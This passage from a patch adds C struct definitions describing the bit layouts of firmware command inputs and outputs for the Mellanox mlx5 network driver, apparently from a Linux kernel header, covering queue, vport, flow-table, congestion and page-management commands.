reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 tisn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_tir_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0xc0]; + + struct mlx5_ifc_tirc_bits tir_context; +}; + +struct mlx5_ifc_query_tir_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 tirn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_srq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 
reserved_1[0x40]; + + struct mlx5_ifc_srqc_bits srq_context_entry; + + u8 reserved_2[0x600]; + + u8 pas[0][0x40]; +}; + +struct mlx5_ifc_query_srq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 srqn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_sq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0xc0]; + + struct mlx5_ifc_sqc_bits sq_context; +}; + +struct mlx5_ifc_query_sq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 sqn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_special_contexts_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x20]; + + u8 resd_lkey[0x20]; +}; + +struct mlx5_ifc_query_special_contexts_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_query_rqt_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0xc0]; + + struct mlx5_ifc_rqtc_bits rqt_context; +}; + +struct mlx5_ifc_query_rqt_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 rqtn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_rq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0xc0]; + + struct mlx5_ifc_rqc_bits rq_context; +}; + +struct mlx5_ifc_query_rq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 rqn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_roce_address_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_roce_addr_layout_bits roce_address; +}; + +struct mlx5_ifc_query_roce_address_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 roce_address_index[0x10]; + u8 reserved_2[0x10]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_rmp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0xc0]; + + struct mlx5_ifc_rmpc_bits rmp_context; +}; + +struct mlx5_ifc_query_rmp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 rmpn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_qp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + u8 opt_param_mask[0x20]; + + u8 reserved_2[0x20]; + + struct mlx5_ifc_qpc_bits qpc; + + u8 reserved_3[0x80]; + + u8 pas[0][0x40]; +}; + +struct mlx5_ifc_query_qp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_q_counter_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + u8 rx_write_requests[0x20]; + + u8 reserved_2[0x20]; + + u8 rx_read_requests[0x20]; + + u8 reserved_3[0x20]; + + u8 rx_atomic_requests[0x20]; + + u8 reserved_4[0x20]; + + u8 rx_dct_connect[0x20]; + + u8 reserved_5[0x20]; + + u8 out_of_buffer[0x20]; + + u8 reserved_6[0x20]; + + u8 out_of_sequence[0x20]; + + u8 reserved_7[0x620]; +}; + +struct mlx5_ifc_query_q_counter_in_bits { + u8 opcode[0x10]; + u8 
reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x80]; + + u8 clear[0x1]; + u8 reserved_3[0x1f]; + + u8 reserved_4[0x18]; + u8 counter_set_id[0x8]; +}; + +struct mlx5_ifc_query_pages_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x10]; + u8 function_id[0x10]; + + u8 num_pages[0x20]; +}; + +enum { + MLX5_QUERY_PAGES_IN_OP_MOD_BOOT_PAGES = 0x1, + MLX5_QUERY_PAGES_IN_OP_MOD_INIT_PAGES = 0x2, + MLX5_QUERY_PAGES_IN_OP_MOD_REGULAR_PAGES = 0x3, +}; + +struct mlx5_ifc_query_pages_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x10]; + u8 function_id[0x10]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_nic_vport_context_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_nic_vport_context_bits nic_vport_context; +}; + +struct mlx5_ifc_query_nic_vport_context_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 other_vport[0x1]; + u8 reserved_2[0xf]; + u8 vport_number[0x10]; + + u8 reserved_3[0x5]; + u8 allowed_list_type[0x3]; + u8 reserved_4[0x18]; +}; + +struct mlx5_ifc_query_mkey_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_mkc_bits memory_key_mkey_entry; + + u8 reserved_2[0x600]; + + u8 bsf0_klm0_pas_mtt0_1[16][0x8]; + + u8 bsf1_klm1_pas_mtt2_3[16][0x8]; +}; + +struct mlx5_ifc_query_mkey_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 mkey_index[0x18]; + + u8 pg_access[0x1]; + u8 reserved_3[0x1f]; +}; + +struct mlx5_ifc_query_mad_demux_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + u8 mad_dumux_parameters_block[0x20]; +}; + +struct mlx5_ifc_query_mad_demux_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_query_l2_table_entry_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0xa0]; + + u8 reserved_2[0x13]; + u8 vlan_valid[0x1]; + u8 vlan[0xc]; + + struct mlx5_ifc_mac_address_layout_bits mac_address; + + u8 reserved_3[0xc0]; +}; + +struct mlx5_ifc_query_l2_table_entry_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x60]; + + u8 reserved_3[0x8]; + u8 table_index[0x18]; + + u8 reserved_4[0x140]; +}; + +struct mlx5_ifc_query_issi_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x10]; + u8 current_issi[0x10]; + + u8 reserved_2[0xa0]; + + u8 supported_issi_reserved[76][0x8]; + u8 supported_issi_dw0[0x20]; +}; + +struct mlx5_ifc_query_issi_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_query_hca_vport_pkey_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_pkey_bits pkey[0]; +}; + +struct mlx5_ifc_query_hca_vport_pkey_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 other_vport[0x1]; + u8 reserved_2[0xf]; + u8 vport_number[0x10]; + + u8 reserved_3[0x10]; + u8 pkey_index[0x10]; +}; + +struct mlx5_ifc_query_hca_vport_gid_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; 
+ + u8 syndrome[0x20]; + + u8 reserved_1[0x20]; + + u8 gids_num[0x10]; + u8 reserved_2[0x10]; + + struct mlx5_ifc_array128_auto_bits gid[0]; +}; + +struct mlx5_ifc_query_hca_vport_gid_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 other_vport[0x1]; + u8 reserved_2[0xf]; + u8 vport_number[0x10]; + + u8 reserved_3[0x10]; + u8 gid_index[0x10]; +}; + +struct mlx5_ifc_query_hca_vport_context_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_hca_vport_context_bits hca_vport_context; +}; + +struct mlx5_ifc_query_hca_vport_context_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 other_vport[0x1]; + u8 reserved_2[0xf]; + u8 vport_number[0x10]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_hca_cap_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + union mlx5_ifc_hca_cap_union_bits capability; +}; + +struct mlx5_ifc_query_hca_cap_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_query_flow_table_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x80]; + + u8 reserved_2[0x8]; + u8 level[0x8]; + u8 reserved_3[0x8]; + u8 log_size[0x8]; + + u8 reserved_4[0x120]; +}; + +struct mlx5_ifc_query_flow_table_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + u8 table_type[0x8]; + u8 reserved_3[0x18]; + + u8 reserved_4[0x8]; + u8 table_id[0x18]; + + u8 reserved_5[0x140]; +}; + +struct mlx5_ifc_query_fte_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x1c0]; + + struct mlx5_ifc_flow_context_bits flow_context; +}; + +struct mlx5_ifc_query_fte_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + u8 table_type[0x8]; + u8 reserved_3[0x18]; + + u8 reserved_4[0x8]; + u8 table_id[0x18]; + + u8 reserved_5[0x40]; + + u8 flow_index[0x20]; + + u8 reserved_6[0xe0]; +}; + +enum { + MLX5_QUERY_FLOW_GROUP_OUT_MATCH_CRITERIA_ENABLE_OUTER_HEADERS = 0x0, + MLX5_QUERY_FLOW_GROUP_OUT_MATCH_CRITERIA_ENABLE_MISC_PARAMETERS = 0x1, + MLX5_QUERY_FLOW_GROUP_OUT_MATCH_CRITERIA_ENABLE_INNER_HEADERS = 0x2, +}; + +struct mlx5_ifc_query_flow_group_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0xa0]; + + u8 start_flow_index[0x20]; + + u8 reserved_2[0x20]; + + u8 end_flow_index[0x20]; + + u8 reserved_3[0xa0]; + + u8 reserved_4[0x18]; + u8 match_criteria_enable[0x8]; + + struct mlx5_ifc_fte_match_param_bits match_criteria; + + u8 reserved_5[0xe00]; +}; + +struct mlx5_ifc_query_flow_group_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + u8 table_type[0x8]; + u8 reserved_3[0x18]; + + u8 reserved_4[0x8]; + u8 table_id[0x18]; + + u8 group_id[0x20]; + + u8 reserved_5[0x120]; +}; + +struct mlx5_ifc_query_eq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_eqc_bits eq_context_entry; + + u8 reserved_2[0x40]; + + u8 event_bitmask[0x40]; + + u8 reserved_3[0x580]; + + u8 pas[0][0x40]; +}; + +struct mlx5_ifc_query_eq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 
op_mod[0x10]; + + u8 reserved_2[0x18]; + u8 eq_number[0x8]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_dct_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_dctc_bits dct_context_entry; + + u8 reserved_2[0x180]; +}; + +struct mlx5_ifc_query_dct_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 dctn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_cq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_cqc_bits cq_context; + + u8 reserved_2[0x600]; + + u8 pas[0][0x40]; +}; + +struct mlx5_ifc_query_cq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 cqn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_cong_status_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x20]; + + u8 enable[0x1]; + u8 tag_enable[0x1]; + u8 reserved_2[0x1e]; +}; + +struct mlx5_ifc_query_cong_status_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x18]; + u8 priority[0x4]; + u8 cong_protocol[0x4]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_cong_statistics_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + u8 cur_flows[0x20]; + + u8 sum_flows[0x20]; + + u8 cnp_ignored_high[0x20]; + + u8 cnp_ignored_low[0x20]; + + u8 cnp_handled_high[0x20]; + + u8 cnp_handled_low[0x20]; + + u8 reserved_2[0x100]; + + u8 time_stamp_high[0x20]; + + u8 time_stamp_low[0x20]; + + u8 accumulators_period[0x20]; + + u8 ecn_marked_roce_packets_high[0x20]; + + u8 ecn_marked_roce_packets_low[0x20]; + + u8 cnps_sent_high[0x20]; + + u8 cnps_sent_low[0x20]; + + u8 reserved_3[0x560]; +}; + +struct mlx5_ifc_query_cong_statistics_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 clear[0x1]; + u8 reserved_2[0x1f]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_cong_params_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + union mlx5_ifc_cong_control_roce_ecn_auto_bits congestion_parameters; +}; + +struct mlx5_ifc_query_cong_params_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x1c]; + u8 cong_protocol[0x4]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_adapter_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_query_adapter_param_block_bits query_adapter_struct; +}; + +struct mlx5_ifc_query_adapter_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_qp_2rst_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_qp_2rst_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_qp_2err_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_qp_2err_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 
qpn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_page_fault_resume_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_page_fault_resume_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 error[0x1]; + u8 reserved_2[0x4]; + u8 rdma[0x1]; + u8 read_write[0x1]; + u8 req_res[0x1]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_nop_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_nop_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_modify_vport_state_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_modify_vport_state_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 other_vport[0x1]; + u8 reserved_2[0xf]; + u8 vport_number[0x10]; + + u8 reserved_3[0x18]; + u8 admin_state[0x4]; + u8 reserved_4[0x4]; +}; + +struct mlx5_ifc_modify_tis_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_modify_tis_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 tisn[0x18]; + + u8 reserved_3[0x20]; + + u8 modify_bitmask[0x40]; + + u8 reserved_4[0x40]; + + struct mlx5_ifc_tisc_bits ctx; +}; + +struct mlx5_ifc_modify_tir_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_modify_tir_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 tirn[0x18]; + + u8 reserved_3[0x20]; + + u8 modify_bitmask[0x40]; + + u8 reserved_4[0x40]; + + struct mlx5_ifc_tirc_bits ctx; +}; + +struct mlx5_ifc_modify_sq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_modify_sq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 sq_state[0x4]; + u8 reserved_2[0x4]; + u8 sqn[0x18]; + + u8 reserved_3[0x20]; + + u8 modify_bitmask[0x40]; + + u8 reserved_4[0x40]; + + struct mlx5_ifc_sqc_bits ctx; +}; + +struct mlx5_ifc_modify_rqt_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_modify_rqt_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 rqtn[0x18]; + + u8 reserved_3[0x20]; + + u8 modify_bitmask[0x40]; + + u8 reserved_4[0x40]; + + struct mlx5_ifc_rqtc_bits ctx; +}; + +struct mlx5_ifc_modify_rq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_modify_rq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 rq_state[0x4]; + u8 reserved_2[0x4]; + u8 rqn[0x18]; + + u8 reserved_3[0x20]; + + u8 modify_bitmask[0x40]; + + u8 reserved_4[0x40]; + + struct mlx5_ifc_rqc_bits ctx; +}; + +struct mlx5_ifc_modify_rmp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_modify_rmp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 
rmp_state[0x4]; + u8 reserved_2[0x4]; + u8 rmpn[0x18]; + + u8 reserved_3[0x20]; + + u8 modify_bitmask[0x40]; + + u8 reserved_4[0x40]; + + struct mlx5_ifc_rmpc_bits ctx; +}; + +struct mlx5_ifc_modify_nic_vport_context_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_modify_nic_vport_field_select_bits { + u8 reserved_0[0x1c]; + u8 permanent_address[0x1]; + u8 addresses_list[0x1]; + u8 roce_en[0x1]; + u8 reserved_1[0x1]; +}; + +struct mlx5_ifc_modify_nic_vport_context_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 other_vport[0x1]; + u8 reserved_2[0xf]; + u8 vport_number[0x10]; + + struct mlx5_ifc_modify_nic_vport_field_select_bits field_select; + + u8 reserved_3[0x780]; + + struct mlx5_ifc_nic_vport_context_bits nic_vport_context; +}; + +struct mlx5_ifc_modify_hca_vport_context_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_modify_hca_vport_context_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 other_vport[0x1]; + u8 reserved_2[0xf]; + u8 vport_number[0x10]; + + u8 reserved_3[0x20]; + + struct mlx5_ifc_hca_vport_context_bits hca_vport_context; +}; + +struct mlx5_ifc_modify_cq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +enum { + MLX5_MODIFY_CQ_IN_OP_MOD_MODIFY_CQ = 0x0, + MLX5_MODIFY_CQ_IN_OP_MOD_RESIZE_CQ = 0x1, +}; + +struct mlx5_ifc_modify_cq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 cqn[0x18]; + + union mlx5_ifc_modify_field_select_resize_field_select_auto_bits modify_field_select_resize_field_select; + + struct mlx5_ifc_cqc_bits cq_context; + + u8 reserved_3[0x600]; + + u8 pas[0][0x40]; +}; + +struct mlx5_ifc_modify_cong_status_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_modify_cong_status_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x18]; + u8 priority[0x4]; + u8 cong_protocol[0x4]; + + u8 enable[0x1]; + u8 tag_enable[0x1]; + u8 reserved_3[0x1e]; +}; + +struct mlx5_ifc_modify_cong_params_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_modify_cong_params_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x1c]; + u8 cong_protocol[0x4]; + + union mlx5_ifc_field_select_802_1_r_roce_auto_bits field_select; + + u8 reserved_3[0x80]; + + union mlx5_ifc_cong_control_roce_ecn_auto_bits congestion_parameters; +}; + +struct mlx5_ifc_manage_pages_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 output_num_entries[0x20]; + + u8 reserved_1[0x20]; + + u8 pas[0][0x40]; +}; + +enum { + MLX5_MANAGE_PAGES_IN_OP_MOD_ALLOCATION_FAIL = 0x0, + MLX5_MANAGE_PAGES_IN_OP_MOD_ALLOCATION_SUCCESS = 0x1, + MLX5_MANAGE_PAGES_IN_OP_MOD_HCA_RETURN_PAGES = 0x2, +}; + +struct mlx5_ifc_manage_pages_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x10]; + u8 function_id[0x10]; + + u8 input_num_entries[0x20]; + + u8 pas[0][0x40]; +}; + +struct mlx5_ifc_mad_ifc_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 
reserved_1[0x40]; + + u8 response_mad_packet[256][0x8]; +}; + +struct mlx5_ifc_mad_ifc_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 remote_lid[0x10]; + u8 reserved_2[0x8]; + u8 port[0x8]; + + u8 reserved_3[0x20]; + + u8 mad[256][0x8]; +}; + +struct mlx5_ifc_init_hca_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_init_hca_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_init2rtr_qp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_init2rtr_qp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; + + u8 opt_param_mask[0x20]; + + u8 reserved_4[0x20]; + + struct mlx5_ifc_qpc_bits qpc; + + u8 reserved_5[0x80]; +}; + +struct mlx5_ifc_init2init_qp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_init2init_qp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; + + u8 opt_param_mask[0x20]; + + u8 reserved_4[0x20]; + + struct mlx5_ifc_qpc_bits qpc; + + u8 reserved_5[0x80]; +}; + +struct mlx5_ifc_get_dropped_packet_log_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + u8 packet_headers_log[128][0x8]; + + u8 packet_syndrome[64][0x8]; +}; + +struct 